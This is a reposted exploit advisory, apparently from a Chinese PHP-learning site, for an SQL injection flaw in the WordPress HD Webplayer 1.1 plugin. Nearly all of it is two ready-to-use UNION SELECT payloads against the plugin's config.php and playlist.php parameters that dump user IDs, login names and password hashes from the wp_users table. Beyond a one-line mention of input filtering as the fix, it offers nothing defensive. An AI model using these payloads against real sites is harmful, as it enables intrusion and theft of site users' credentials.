来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 标题 Wordpress HD Webplayer 1.1 SQL Injection作者: JoinSe7en程序官网: http://www.hdwebplayer.com/软件连接: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip影响版本: version......
标题 Wordpress HD Webplayer 1.1 SQL Injection +----------------------------------------------------------------------+ # Location: http://www.2cto.com /wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE] # Exploit Code: config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different +----------------------------------------------------------------------+ # Location: http://www.2cto.com /wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE] # Exploit Code: playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different # Dork 1 (config.php) # Dork 2 (playlist.php) # Dork 3 (General): 修复:针对性过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com